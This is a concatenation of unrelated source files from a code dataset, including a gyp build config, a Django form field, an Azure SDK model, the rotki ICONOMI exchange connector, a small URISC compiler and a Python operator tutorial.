'-framework OpenAL',
]
}
}],
['mpg123_backend=="win32"', {
'link_settings': {
'libraries': [
'-lwinmm.lib',
],
}
}],
['mpg123_backend=="pulse"', {
'link_settings': {
'libraries': [
'-lpulse',
'-lpulse-simple',
],
}
}],
['mpg123_backend=="jack"', {
'link_settings': {
'libraries': [
'-ljack',
],
}
}],
],
'sources': [ 'src/output/<(mpg123_backend).c' ],
},
{
'target_name': 'test',
'type': 'executable',
'dependencies': [ 'mpg123' ],
'sources': [ 'test.c' ]
},
{
'target_name': 'output_test',
'type': 'executable',
'dependencies': [ 'output' ],
'sources': [ 'test_output.c' ]
}
]
}
| StarcoderdataPython |
6441408 | <reponame>OscarFM014/IntroCS<filename>How_to_manage_data/product_list.py
# Define a procedure, product_list,
# that takes as input a list of numbers,
# and returns a number that is
# the result of multiplying all
# those numbers together.
def product_list(list_of_numbers):
    """Return the product of all numbers in *list_of_numbers*.

    An empty list yields 1, the multiplicative identity.
    """
    # The previous revision kept a dead, commented-out implementation inside
    # the docstring; it has been removed in favor of real documentation.
    # (A plain loop is used so the file stays Python-2 compatible — the
    # module-level demo below uses print statements.)
    total = 1
    for number in list_of_numbers:
        total *= number
    return total
# Ad-hoc smoke checks (Python 2 print statements); expected output inline.
print product_list([9])
#>>> 9
print product_list([1,2,3,4])
#>>> 24
print product_list([0.5,0.5])
#>>> 0.25
| StarcoderdataPython |
3477561 | <filename>calendars/fields.py
# -*- coding: utf-8 -*-
'''
Created on Mar 20, 2011
@author: <NAME>
@copyright: Copyright © 2011
other contributers:
'''
from django import forms
from django.conf import settings
from django.forms import widgets
from django.contrib.auth.models import User
from django.utils.translation import ugettext_lazy as _
class CommaSeparatedUserInput(widgets.Input):
    """Text input that renders a list of users as comma separated ids."""

    input_type = 'text'

    def render(self, id, value, attrs=None):
        """Render the widget, flattening a user list into "id, id, ..."."""
        if value is None:
            value = ''
        elif isinstance(value, (list, tuple)):
            # Join the primary keys of the selected users for display.
            value = ', '.join(str(user.id) for user in value)
        return super(CommaSeparatedUserInput, self).render(id, value, attrs)
class CommaSeparatedUserField(forms.Field):
    """Form field accepting a comma separated string of user ids.

    ``clean`` resolves the ids to ``User`` instances; unknown ids and users
    rejected by the optional ``recipient_filter`` raise a ValidationError.
    """

    widget = CommaSeparatedUserInput

    def __init__(self, *args, **kwargs):
        # ``recipient_filter`` is an optional callable(User) -> bool; users
        # for which it returns False are reported as invalid.
        recipient_filter = kwargs.pop('recipient_filter', None)
        self._recipient_filter = recipient_filter
        super(CommaSeparatedUserField, self).__init__(*args, **kwargs)

    def clean(self, value):
        """Return the list of Users named by *value*, or '' when empty."""
        super(CommaSeparatedUserField, self).clean(value)
        if not value:
            return ''
        if isinstance(value, (list, tuple)):
            # Already resolved (e.g. initial data): pass through untouched.
            return value
        ids = set(value.split(','))
        ids_set = set([str(id) for id in ids if id != ""])
        users = list(User.objects.filter(id__in=ids_set))
        unknown_ids = ids_set ^ set([str(user.id) for user in users])
        recipient_filter = self._recipient_filter
        invalid_users = []
        if recipient_filter is not None:
            # BUG FIX: the old code removed entries from ``users`` while
            # iterating over it, which silently skipped the element right
            # after every removal. Collect rejected users first, then
            # remove them.
            rejected = [u for u in users if recipient_filter(u) is False]
            for u in rejected:
                users.remove(u)
                invalid_users.append(u.id)
        if unknown_ids or invalid_users:
            raise forms.ValidationError(_(u"The following id are incorrect: %(users)s") % {'users': ', '.join([str(i) for i in list(unknown_ids | set(invalid_users))])})
        return users
359923 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class AcceptOwnershipStatusResponse(Model):
    """Subscription Accept Ownership Response.

    Variables are only populated by the server, and will be ignored when
    sending a request.

    :ivar subscription_id: Newly created subscription Id.
    :vartype subscription_id: str
    :param accept_ownership_state: Possible values include: 'Pending',
     'Completed', 'Expired'
    :type accept_ownership_state: str or
     ~azure.mgmt.subscription.models.AcceptOwnership
    :ivar billing_owner: UPN of the billing owner
    :vartype billing_owner: str
    :param subscription_tenant_id: Tenant Id of the subscription
    :type subscription_tenant_id: str
    :param display_name: The display name of the subscription.
    :type display_name: str
    :param tags: Tags for the subscription
    :type tags: dict[str, str]
    """

    # Fields the server populates; clients may not set them on requests.
    _validation = {
        'subscription_id': {'readonly': True},
        'billing_owner': {'readonly': True},
    }

    # Maps Python attribute names to wire (JSON) keys and msrest types.
    _attribute_map = {
        'subscription_id': {'key': 'subscriptionId', 'type': 'str'},
        'accept_ownership_state': {'key': 'acceptOwnershipState', 'type': 'str'},
        'billing_owner': {'key': 'billingOwner', 'type': 'str'},
        'subscription_tenant_id': {'key': 'subscriptionTenantId', 'type': 'str'},
        'display_name': {'key': 'displayName', 'type': 'str'},
        'tags': {'key': 'tags', 'type': '{str}'},
    }

    def __init__(self, *, accept_ownership_state=None, subscription_tenant_id: str=None, display_name: str=None, tags=None, **kwargs) -> None:
        super(AcceptOwnershipStatusResponse, self).__init__(**kwargs)
        # Read-only (server-populated) attributes start as None.
        self.subscription_id = None
        self.accept_ownership_state = accept_ownership_state
        self.billing_owner = None
        self.subscription_tenant_id = subscription_tenant_id
        self.display_name = display_name
        self.tags = tags
| StarcoderdataPython |
12857832 | <filename>rotkehlchen/exchanges/iconomi.py
import base64
import hashlib
import hmac
import json
import logging
import time
from json.decoder import JSONDecodeError
from typing import TYPE_CHECKING, Any, Dict, List, Literal, Optional, Tuple
from urllib.parse import urlencode
import requests
from rotkehlchen.accounting.ledger_actions import LedgerAction
from rotkehlchen.accounting.structures.balance import Balance
from rotkehlchen.assets.asset import Asset
from rotkehlchen.assets.converters import UNSUPPORTED_ICONOMI_ASSETS, asset_from_iconomi
from rotkehlchen.constants import ZERO
from rotkehlchen.constants.assets import A_AUST
from rotkehlchen.errors.asset import UnknownAsset, UnsupportedAsset
from rotkehlchen.errors.misc import RemoteError
from rotkehlchen.errors.serialization import DeserializationError
from rotkehlchen.exchanges.data_structures import (
AssetMovement,
Location,
MarginPosition,
Price,
Trade,
TradeType,
)
from rotkehlchen.exchanges.exchange import ExchangeInterface, ExchangeQueryBalances
from rotkehlchen.inquirer import Inquirer
from rotkehlchen.logging import RotkehlchenLogsAdapter
from rotkehlchen.serialization.deserialize import (
deserialize_asset_amount,
deserialize_fee,
deserialize_fval,
)
from rotkehlchen.types import ApiKey, ApiSecret, Timestamp
from rotkehlchen.user_messages import MessagesAggregator
if TYPE_CHECKING:
from rotkehlchen.db.dbhandler import DBHandler
logger = logging.getLogger(__name__)
log = RotkehlchenLogsAdapter(logger)
def trade_from_iconomi(raw_trade: Dict) -> Trade:
    """Turn an iconomi trade entry to our own trade format

    May raise:
        - UnknownAsset
        - UnsupportedAsset
        - DeserializationError
        - KeyError
    """
    timestamp = raw_trade['timestamp']
    trade_type_str = raw_trade['type']
    if trade_type_str == 'buy_asset':
        trade_type = TradeType.BUY
        tx_asset = asset_from_iconomi(raw_trade['target_ticker'])
        tx_amount = deserialize_asset_amount(raw_trade['target_amount'])
        native_asset = asset_from_iconomi(raw_trade['source_ticker'])
        native_amount = deserialize_asset_amount(raw_trade['source_amount'])
    elif trade_type_str == 'sell_asset':
        trade_type = TradeType.SELL
        tx_asset = asset_from_iconomi(raw_trade['source_ticker'])
        tx_amount = deserialize_asset_amount(raw_trade['source_amount'])
        native_amount = deserialize_asset_amount(raw_trade['target_amount'])
        native_asset = asset_from_iconomi(raw_trade['target_ticker'])
    else:
        # BUG FIX: an unexpected type previously fell through the if/elif
        # and crashed with a NameError below; raise the documented
        # deserialization error instead so callers can handle it.
        raise DeserializationError(
            f'Unexpected iconomi trade type {trade_type_str}',
        )

    amount = tx_amount
    # Price of the traded asset expressed in the native (quote) asset.
    rate = Price(native_amount / tx_amount)
    fee_amount = deserialize_fee(raw_trade['fee_amount'])
    fee_asset = asset_from_iconomi(raw_trade['fee_ticker'])

    return Trade(
        timestamp=timestamp,
        location=Location.ICONOMI,
        base_asset=tx_asset,
        quote_asset=native_asset,
        trade_type=trade_type,
        amount=amount,
        rate=rate,
        fee=fee_amount,
        fee_currency=fee_asset,
        link=str(raw_trade['transactionId']),
    )
class Iconomi(ExchangeInterface): # lgtm[py/missing-call-to-init]
    def __init__(
            self,
            name: str,
            api_key: ApiKey,
            secret: ApiSecret,
            database: 'DBHandler',
            msg_aggregator: MessagesAggregator,
    ):
        """Initialize the ICONOMI exchange connector.

        *name* is the user-chosen label for this exchange connection; the
        credentials are forwarded to the generic ExchangeInterface.
        """
        super().__init__(
            name=name,
            location=Location.ICONOMI,
            api_key=api_key,
            secret=secret,
            database=database,
        )
        # Base URL for all API requests made by _api_query.
        self.uri = 'https://api.iconomi.com'
        self.msg_aggregator = msg_aggregator
def edit_exchange_credentials(
self,
api_key: Optional[ApiKey],
api_secret: Optional[ApiSecret],
passphrase: Optional[str],
) -> bool:
changed = super().edit_exchange_credentials(api_key, api_secret, passphrase)
return changed
def _generate_signature(self, request_type: str, request_path: str, timestamp: str) -> str:
signed_data = ''.join([timestamp, request_type.upper(), request_path, '']).encode()
signature = hmac.new(
self.secret,
signed_data,
hashlib.sha512,
)
return base64.b64encode(signature.digest()).decode()
    def _api_query(
            self,
            verb: Literal['get', 'post'],
            path: str,
            options: Optional[Dict] = None,
            authenticated: bool = True,
    ) -> Any:
        """
        Queries ICONOMI with the given verb for the given path and options.

        Returns the decoded JSON response. Raises RemoteError if the
        request fails, the body is not valid JSON, or the HTTP status is
        not 200/201.
        """
        assert verb in ('get', 'post'), (
            'Given verb {} is not a valid HTTP verb'.format(verb)
        )

        request_path_no_args = '/v1/' + path

        data = ''
        if not options:
            request_path = request_path_no_args
        else:
            request_path = request_path_no_args + '?' + urlencode(options)

        # Millisecond timestamp, required by the ICN-TIMESTAMP header and
        # included in the signed message.
        timestamp = str(int(time.time() * 1000))
        request_url = self.uri + request_path

        headers = {}
        if authenticated:
            # NOTE: the signature covers the path WITHOUT the query string.
            signature = self._generate_signature(
                request_type=verb.upper(),
                request_path=request_path_no_args,
                timestamp=timestamp,
            )
            headers.update({
                'ICN-SIGN': signature,
                # set api key only here since if given in non authenticated endpoint gives 400
                'ICN-API-KEY': self.api_key,
                'ICN-TIMESTAMP': timestamp,
            })

        # NOTE(review): `data` is always '' above, so this branch is
        # currently dead; kept as-is in case a body is added later.
        if data != '':
            headers.update({
                'Content-Type': 'application/json',
                'Content-Length': str(len(data)),
            })

        log.debug('ICONOMI API Query', verb=verb, request_url=request_url)

        try:
            response = getattr(self.session, verb)(
                request_url,
                data=data,
                timeout=30,
                headers=headers,
            )
        except requests.exceptions.RequestException as e:
            raise RemoteError(f'ICONOMI API request failed due to {str(e)}') from e

        try:
            json_ret = json.loads(response.text)
        except JSONDecodeError as exc:
            raise RemoteError('ICONOMI returned invalid JSON response') from exc

        if response.status_code not in (200, 201):
            # Prefer the API's own error message when one is provided.
            if isinstance(json_ret, dict) and 'message' in json_ret:
                raise RemoteError(json_ret['message'])

            raise RemoteError(
                'ICONOMI api request for {} failed with HTTP status code {}'.format(
                    response.url,
                    response.status_code,
                ),
            )

        return json_ret
def validate_api_key(self) -> Tuple[bool, str]:
"""
Validates that the ICONOMI API key is good for usage in rotki
"""
try:
self._api_query('get', 'user/balance')
return True, ""
except RemoteError:
return False, 'Provided API Key is invalid'
    def query_balances(self, **kwargs: Any) -> ExchangeQueryBalances:
        """Query all asset and strategy balances held at ICONOMI.

        Returns (balances, '') on success or (None, error_message) when the
        API cannot be reached. Individual entries that fail to deserialize
        are skipped with a warning rather than aborting the whole query.
        """
        assets_balance: Dict[Asset, Balance] = {}
        try:
            resp_info = self._api_query('get', 'user/balance')
        except RemoteError as e:
            msg = (
                'ICONOMI API request failed. Could not reach ICONOMI due '
                'to {}'.format(e)
            )
            log.error(msg)
            return None, msg

        # All values below are interpreted as USD; bail out otherwise.
        if resp_info['currency'] != 'USD':
            raise RemoteError('Iconomi API did not return values in USD')

        # Plain asset balances.
        for balance_info in resp_info['assetList']:
            ticker = balance_info['ticker']
            try:
                asset = asset_from_iconomi(ticker)

                try:
                    usd_value = deserialize_fval(balance_info['value'], 'usd_value', 'iconomi')
                except (DeserializationError, KeyError) as e:
                    msg = str(e)
                    if isinstance(e, KeyError):
                        msg = f'missing key entry for {msg}.'
                    self.msg_aggregator.add_warning(
                        f'Skipping iconomi balance entry {balance_info} due to {msg}',
                    )
                    continue

                try:
                    amount = deserialize_asset_amount(balance_info['balance'])
                except (DeserializationError, KeyError) as e:
                    msg = str(e)
                    if isinstance(e, KeyError):
                        msg = f'missing key entry for {msg}.'
                    self.msg_aggregator.add_warning(
                        f'Skipping iconomi balance entry {balance_info} due to {msg}',
                    )
                    continue

                assets_balance[asset] = Balance(
                    amount=amount,
                    usd_value=usd_value,
                )
            except (UnknownAsset, UnsupportedAsset) as e:
                asset_tag = 'unknown' if isinstance(e, UnknownAsset) else 'unsupported'
                self.msg_aggregator.add_warning(
                    f'Found {asset_tag} ICONOMI asset {ticker}. '
                    f' Ignoring its balance query.',
                )
                continue

        # Strategy ("DAA") balances; only the AUSTS Earn strategy is mapped.
        for balance_info in resp_info['daaList']:
            ticker = balance_info['ticker']
            if ticker == 'AUSTS':
                # The AUSTS strategy is 'ICONOMI Earn'. We know that this strategy holds its
                # value in Anchor UST (AUST). That's why we report the user balance for this
                # strategy as usd_value / AUST price.
                try:
                    aust_usd_price = Inquirer().find_usd_price(asset=A_AUST)
                except RemoteError as e:
                    self.msg_aggregator.add_error(
                        f'Error processing ICONOMI balance entry due to inability to '
                        f'query USD price: {str(e)}. Skipping balance entry',
                    )
                    continue
                # Guard against division by zero below.
                if aust_usd_price == ZERO:
                    self.msg_aggregator.add_error(
                        'Error processing ICONOMI balance entry because the USD price '
                        'for AUST was reported as 0. Skipping balance entry',
                    )
                    continue
                try:
                    usd_value = deserialize_fval(balance_info['value'], 'usd_value', 'iconomi')
                except (DeserializationError, KeyError) as e:
                    msg = str(e)
                    if isinstance(e, KeyError):
                        msg = f'missing key entry for {msg}.'
                    self.msg_aggregator.add_warning(
                        f'Skipping iconomi balance entry {balance_info} due to {msg}',
                    )
                    continue

                assets_balance[A_AUST] = Balance(
                    amount=usd_value / aust_usd_price,
                    usd_value=usd_value,
                )
            else:
                self.msg_aggregator.add_warning(
                    f'Found unsupported ICONOMI strategy {ticker}. '
                    f' Ignoring its balance query.',
                )

        return assets_balance, ''
def query_online_trade_history(
self,
start_ts: Timestamp,
end_ts: Timestamp,
) -> Tuple[List[Trade], Tuple[Timestamp, Timestamp]]:
page = 0
all_transactions = []
while True:
resp = self._api_query('get', 'user/activity', {"pageNumber": str(page)})
if len(resp['transactions']) == 0:
break
all_transactions.extend(resp['transactions'])
page += 1
log.debug('ICONOMI trade history query', results_num=len(all_transactions))
trades = []
for tx in all_transactions:
timestamp = tx['timestamp']
if timestamp < start_ts:
continue
if timestamp > end_ts:
continue
if tx['type'] in ('buy_asset', 'sell_asset'):
try:
trades.append(trade_from_iconomi(tx))
except UnknownAsset as e:
self.msg_aggregator.add_warning(
f'Ignoring an iconomi transaction because of unsupported '
f'asset {str(e)}')
except (DeserializationError, KeyError) as e:
msg = str(e)
if isinstance(e, KeyError):
msg = f'Missing key entry for {msg}.'
self.msg_aggregator.add_error(
'Error processing an iconomi transaction. Check logs '
'for details. Ignoring it.',
)
log.error(
'Error processing an iconomi transaction',
error=msg,
trade=tx,
)
return trades, (start_ts, end_ts)
def query_supported_tickers(
self,
) -> List[str]:
tickers = []
resp = self._api_query('get', 'assets', authenticated=False)
for asset_info in resp:
if not asset_info['supported']:
continue
if asset_info['ticker'] in UNSUPPORTED_ICONOMI_ASSETS:
continue
tickers.append(asset_info['ticker'])
return tickers
def query_online_deposits_withdrawals(
self, # pylint: disable=no-self-use
start_ts: Timestamp, # pylint: disable=unused-argument
end_ts: Timestamp, # pylint: disable=unused-argument
) -> List[AssetMovement]:
return [] # noop for iconomi
def query_online_margin_history(
self, # pylint: disable=no-self-use
start_ts: Timestamp, # pylint: disable=unused-argument
end_ts: Timestamp, # pylint: disable=unused-argument
) -> List[MarginPosition]:
return [] # noop for iconomi
def query_online_income_loss_expense(
self, # pylint: disable=no-self-use
start_ts: Timestamp, # pylint: disable=unused-argument
end_ts: Timestamp, # pylint: disable=unused-argument
) -> List[LedgerAction]:
return [] # noop for iconomi
| StarcoderdataPython |
5072338 | import string
import sys
class URISC_V1_Extended:
    """Compiler from an extended URISC dialect down to plain URISC_V1 text.

    Source lines are tokenised and translated one at a time. The generated
    instructions accumulate in ``self.output`` -- a list of string fragments
    while compiling, joined into a single string by :meth:`comp`. Single
    expression user functions are recorded in ``self.functions``, and the
    ``label_num``/``temp_num`` counters feed the fresh-name generators.

    NOTE(review): the exact semantics of the emitted two-operand
    instructions (including the initial ``1 ?`` seed instruction) depend on
    the target URISC_V1 interpreter, which is not visible here -- confirm
    against the interpreter before changing any emitted sequence.
    """
    def __init__(self, code):
        # Raw source text of the whole program.
        self.code = code
        # Output buffer, pre-seeded with a '1 ?' instruction; kept as a list
        # of fragments until comp() joins it into one string.
        self.output = ['1 ?\n']
        # function name -> [argument-name list, body expression string]
        self.functions = {}
        # Counters used to generate unique labels and temporaries.
        self.label_num = 0
        self.temp_num = 0
    def comp(self):
        """Compile every source line, then join self.output into a string."""
        for line in self.code.split('\n'):
            # print(line)
            self.output.append(self.compln(line))
        self.output = ''.join(self.output)
    def tokln(self, line):
        """Split one source line into whitespace-separated tokens.

        Text inside round brackets is kept together as a single token so
        bracketed sub-expressions survive tokenisation. Returns None for an
        empty line; empty tokens are filtered out.
        """
        if not line:
            return
        out = []
        current = ''
        # Char type stuff
        chartype = ''
        last_chartype = ''
        rb = 0 # Regular-bracket = 0
        # Set initial char type
        if line[0].isalnum():
            chartype = 'A'
        # elif line[0].isdigit():
        #     chartype = 'D'
        elif line[0] in string.punctuation:
            chartype = 'S'
        # elif line[0] == '\n':
        #     chartype = 'L'
        elif line[0].isspace():
            chartype = 'W'
        for c in line:
            last_chartype = chartype
            # Set char type for each character
            if c.isalnum():
                chartype = 'A'
            # elif c.isdigit():
            #     chartype = 'D'
            elif c in string.punctuation:
                chartype = 'S'
            # elif c == '\n':
            #     chartype = 'L'
            elif c.isspace():
                chartype = 'W'
            # Whitespace ends a token, but only outside of brackets.
            if chartype == 'W' and rb <= 0:
                out.append(current)
                current = ''
            else:
                current += c
            # Concatenation stuff
            if c == '(':
                rb += 1
            elif c == ')':
                rb -= 1
        # Final token
        out.append(current)
        # Filter
        out = [a for a in out if a]
        # print(out)
        return out
    def compln(self, line):
        """Translate one source line into URISC_V1 instruction text.

        Handles comments (#), literal pass-through (```), the statement
        forms invert/set/jump/if/ifn/label/print, assignments
        (``var = exp``) and function definitions (``name => args exp``).
        Returns the emitted code (possibly '') for this line.
        """
        line = self.tokln(line)
        out = ''
        if not line or line[0].startswith('#'):
            return ''
        # NOTE(review): this 'if' is not part of the elif chain below, so a
        # ``` line whose tokens happen to contain '=' or '=>' would fall
        # through and have `out` overwritten -- confirm this is intended.
        if line[0] == '```':
            out = ' '.join(line[1:])
        if line[0] == 'invert':
            out = line[1] + ' ?\n'
        elif line[0] == 'set':
            # Set variable to 0
            label = self.get_label()
            out = (
                label + '\n' +
                line[1] + ' ' + label + '\n'
            )
            # Invert variable if desired
            if line[2] != '0' and line[2] != 'false':
                out += line[1] + ' ?\n'
        elif line[0] == 'jump':
            out = (
                '? ' + line[1] + '\n' +
                '? ' + line[1] + '\n'
            )
        elif line[0] == 'if':
            exp = self.compexp(line[1])
            label = line[2]
            # Jump to label if expression result is 1
            out = (
                exp + ' ?\n' +
                exp + ' ' + label + '\n'
            )
        elif line[0] == 'ifn':
            exp = self.compexp(line[1])
            label = line[2]
            # Jump to label if expression result is 0
            out = exp + ' ' + label + '\n'
        elif line[0] == 'label':
            out = line[1] + '\n'
        elif line[0] == 'print':
            # Iterate over each expression in the line and print it as a bit
            for bit in line[1:]:
                exp = self.compexp(bit)
                # Print bit to output buffer
                label_1 = self.get_label()
                label_2 = self.get_label()
                out += (
                    # Set out to 0
                    label_1 + '\n' +
                    'out ' + label_1 + '\n' +
                    # Invert out if expression result
                    exp + ' ' + label_2 + '\n' +
                    'out ?\n' +
                    label_2 + '\n' +
                    exp + ' ?\n' +
                    # Print bit to output buffer
                    'print ?\n'
                )
        elif '=' in line:
            # var = exp
            var = line[0]
            exp = line[2]
            # Expression expansion
            exp = self.compexp(exp)
            # Move expression result into var
            label_1 = self.get_label()
            label_2 = self.get_label()
            out = (
                # Set var to 0
                label_1 + '\n' +
                var + ' ' + label_1 + '\n' +
                # Invert var if expression result
                exp + ' ' + label_2 + '\n' +
                var + ' ?\n' +
                label_2 + '\n' +
                exp + ' ?\n'
            )
        elif '=>' in line:
            # func => arg1,arg2,arg2 ((arg1 & arg2) | arg3)
            name = line[0]
            args = line[2].split(',')
            exp = line[3]
            self.functions[name] = [args, exp]
        return out
    def compexp(self, expression):
        """Compile an expression; return the name that holds its result.

        Recursively expands unary ``(: op a)``, binary ``(a op b)`` and
        function-call ``!(name args...)`` forms, appending the generated
        instructions directly to self.output and returning the variable
        (usually a fresh temporary) holding the value. Bare digits and the
        ``in`` keyword are handled specially; any other token is returned
        unchanged as a variable name.
        """
        line = self.tokln(expression)
        out = ''
        if not expression:
            return ''
        # Unary operators
        if line[0].startswith('(:') and line[0].endswith(')'):
            # Tokenise this bracket expression
            exp = self.tokln(line[0][2:-1])
            # Get result of (op a) and store in a temporary variable
            op = exp[0]
            a = exp[1]
            # Expression expansion
            if a.startswith('(') and a.endswith(')'):
                a = self.compexp(a)
            # Perform operations
            if op == '!':
                label_1 = self.get_label()
                label_2 = self.get_label()
                # Return the result of this code
                out = self.get_temp()
                # Add literal code to the output
                self.output.append(
                    # Set out to 0
                    label_1 + '\n' +
                    out + ' ' + label_1 + '\n' +
                    # Invert out if not a
                    a + ' ?\n' +
                    a + ' ' + label_2 + '\n' +
                    out + ' ?\n' +
                    label_2 + '\n'
                )
                '''
                a ?
                a label_1
                temp_1 ?
                label_1
                '''
        # Logic gates (Binary operators)
        elif line[0].startswith('(') and line[0].endswith(')'):
            # Tokenise this bracket expression
            exp = self.tokln(line[0][1:-1])
            # Get result of (a op b) and store in a temporary variable
            # Left-to-right reduction: each (a op b) collapses into a fresh
            # temporary until only the final result token remains.
            while len(exp) > 1:
                a = exp[0]
                op = exp[1]
                b = exp[2]
                result = ''
                # Expression expansion
                if a.startswith('(') and a.endswith(')'):
                    a = self.compexp(a)
                if b.startswith('(') and b.endswith(')'):
                    b = self.compexp(b)
                # Perform operations
                if op == '&':
                    label_1 = self.get_label()
                    label_2 = self.get_label()
                    label_3 = self.get_label()
                    # Return the result of this code
                    result = self.get_temp()
                    # Add literal code to the output
                    self.output.append(
                        # Set result to 0
                        label_1 + '\n' +
                        result + ' ' + label_1 + '\n' +
                        # Perform logical and
                        a + ' ' + label_2 + '\n' +
                        b + ' ' + label_3 + '\n' +
                        result + ' ?\n' +
                        label_3 + '\n' +
                        b + ' ?\n' +
                        label_2 + '\n' +
                        a + ' ?\n'
                    )
                    '''
                    a end_1
                    b end_2
                    output ?
                    end_2
                    b ?
                    end_1
                    a ?
                    '''
                elif op == '|':
                    label_1 = self.get_label()
                    label_2 = self.get_label()
                    label_3 = self.get_label()
                    # Return the result of this code
                    result = self.get_temp()
                    # Add literal code to the output
                    self.output.append(
                        # Set result to 0
                        label_1 + '\n' +
                        result + ' ' + label_1 + '\n' +
                        # Perform logical or
                        a + ' ?\n' +
                        a + ' ' + label_2 + '\n' +
                        b + ' ?\n' +
                        b + ' ' + label_3 + '\n' +
                        result + ' ?\n' +
                        label_3 + '\n' +
                        label_2 + '\n' +
                        result + ' ?\n'
                    )
                    '''
                    a ?
                    a end_1
                    b ?
                    b end_2
                    output ?
                    end_2
                    end_1
                    output ?
                    '''
                elif op == '^':
                    label_1 = self.get_label()
                    label_2 = self.get_label()
                    label_3 = self.get_label()
                    # Return the result of this code
                    result = self.get_temp()
                    # Add literal code to the output
                    self.output.append(
                        # Set result to 0
                        label_1 + '\n' +
                        result + ' ' + label_1 + '\n' +
                        # Perform logical xor
                        a + ' ' + label_2 + '\n' +
                        result + ' ?\n' +
                        label_2 + '\n' +
                        a + ' ?\n' +
                        b + ' ' + label_3 + '\n' +
                        result + ' ?\n' +
                        label_3 + '\n' +
                        b + ' ?\n'
                    )
                    '''
                    a end_1
                    output ?
                    end_1
                    a ?
                    b end_2
                    output ?
                    end_2
                    b ?
                    '''
                else:
                    raise Exception('invalid binary operation: "' + op + '"')
                exp[:3] = [result]
            # Return the final result
            out = exp[0]
        # Function calling
        elif line[0].startswith('!(') and line[0].endswith(')'):
            # Retrieve function info
            line = self.tokln(line[0][2:-1])
            name = line[0]
            args = line[1:]
            function = self.functions[name]
            func_args = function[0]
            exp = function[1]
            # print('Calling', function, 'with', args)
            # Check arg lengths
            if len(args) != len(func_args):
                raise Exception('invalid number of arguments for function')
            # Save local variables to be retrieved later
            for arg_index in range(len(args)):
                local_arg = args[arg_index]
                temp_var = 'FUNCTION_ARG_' + local_arg
                # Move local variables to function argument variables
                label_1 = self.get_label()
                label_2 = self.get_label()
                self.output.append(
                    # Set temporary variable to 0
                    label_1 + '\n' +
                    temp_var + ' ' + label_1 + '\n' +
                    # Invert temporary variable if local arg is 1
                    local_arg + ' ' + label_2 + '\n' +
                    temp_var + ' ?\n' +
                    label_2 + '\n' +
                    local_arg + ' ?\n'
                )
            # Move temp variables into function argument variables
            for arg_index in range(len(func_args)):
                func_arg = func_args[arg_index]
                local_arg = args[arg_index]
                temp_var = 'FUNCTION_ARG_' + local_arg
                # Move local variables to function argument variables
                label_1 = self.get_label()
                label_2 = self.get_label()
                self.output.append(
                    # Set function arg to 0
                    label_1 + '\n' +
                    func_arg + ' ' + label_1 + '\n' +
                    # Invert function arg if temp var is 1
                    temp_var + ' ' + label_2 + '\n' +
                    func_arg + ' ?\n' +
                    label_2 + '\n' +
                    temp_var + ' ?\n'
                )
            # Compute and return expression
            out = self.compexp(exp)
        # Digits
        elif line[0] == '0':
            return '0'
        elif line[0] == '1':
            return '1'
        # Keywords
        elif line[0] == 'in':
            label_1 = self.get_label()
            label_2 = self.get_label()
            # Return the result of this code
            out = self.get_temp()
            self.output.append(
                # Set out to 0
                label_1 + '\n' +
                out + ' ' + label_1 + '\n' +
                # Invert out if input bit is 1
                'in ' + label_2 + '\n' +
                out + ' ?\n' +
                label_2 + '\n' +
                # NOTE(review): the other branches restore the tested
                # operand here (e.g. `a ?`); this inverts `out` again
                # instead of restoring `in` -- confirm against the
                # interpreter whether 'in ?' was intended.
                out + ' ?\n'
            )
        else:
            return expression
        return out
    def get_label(self):
        """Return a fresh, program-unique label name (L_0, L_1, ...)."""
        label = 'L_' + str(self.label_num)
        self.label_num += 1
        return label
    def get_temp(self):
        """Return a fresh temporary variable name (T_0, T_1, ...)."""
        temp = 'T_' + str(self.temp_num)
        self.temp_num += 1
        return temp
# Compile the source file named on the command line and write the result
# next to it with a '.urisc_v1' suffix appended.
source_path = sys.argv[1]
with open(source_path) as source_file:
    compiler = URISC_V1_Extended(source_file.read())
compiler.comp()
with open(source_path + '.urisc_v1', 'w') as target_file:
    target_file.write(compiler.output)
| StarcoderdataPython |
3340294 | <reponame>dreibh/planetlab-lxc-plcapi<gh_stars>0
from PLC.Faults import *
from PLC.Method import Method
from PLC.Parameter import Parameter, Mixed
from PLC.Auth import Auth
from PLC.NodeGroups import NodeGroup, NodeGroups
class DeleteNodeGroup(Method):
    """
    Delete an existing Node Group.

    Admins may delete any node group.

    Returns 1 if successful, faults otherwise.
    """
    roles = ['admin']
    accepts = [
        Auth(),
        Mixed(NodeGroup.fields['nodegroup_id'],
              NodeGroup.fields['groupname'])
    ]
    returns = Parameter(int, '1 if successful')
    def call(self, auth, node_group_id_or_name):
        """Look up the node group by id or name, delete it, and record the
        event metadata used by the API logging machinery."""
        # Get account information
        nodegroups = NodeGroups(self.api, [node_group_id_or_name])
        if not nodegroups:
            raise PLCInvalidArgument("No such node group")
        nodegroup = nodegroups[0]
        nodegroup.delete()
        # Logging variables
        self.event_objects = {'NodeGroup': [nodegroup['nodegroup_id']]}
        self.message = 'Node group %d deleted' % nodegroup['nodegroup_id']
        return 1
| StarcoderdataPython |
3295233 | <filename>Basic/operator/operator_perbandingan.py<gh_stars>10-100
# Comparison operators are used to
# compare two values against each other
# example
# Variables
a = 5
b = 3
# == (equal to) is used to check
# whether the two values are equal
print("a == b:", a == b) # False
# != (not equal to) is used to check
# whether the two values are not equal
print("a != b:", a != b) # True
# > (greater than) is used to check
# whether the left value is greater than the right value
print("a > b:", a > b) # True
# < (less than) is used to check
# whether the left value is less than the right value
print("a < b:", a < b) # False
# >= (greater than or equal to) is used to check
# whether the left value is greater than or equal to the right value
print("a >= b:", a >= b) # True
# <= (less than or equal to) is used to check
# whether the left value is less than or equal to the right value
print("a <= b:", a <= b) # False
| StarcoderdataPython |
8045926 | <reponame>vhnatyk/vlsistuff
#! /usr/bin/python3
import waveformer
# Marker print; presumably signals that waveformer's import-time work
# (its side effects on import) has completed -- TODO confirm.
print('AFTER')
| StarcoderdataPython |
99446 | <reponame>jstzwj/Mocores<gh_stars>1-10
from mocores.core.util.consistent_hash import (ConsistentHash)
from mocores.core.util.identity import (WorkerID)
from mocores.core.util.message_queue import (MessageQueue)
from mocores.core.util.lru import (LRU) | StarcoderdataPython |
11298151 | # -*- coding: utf-8 -*-
import torch
import os
import sys
sys.path.append('../lightning-transformers')
import argparse
import json
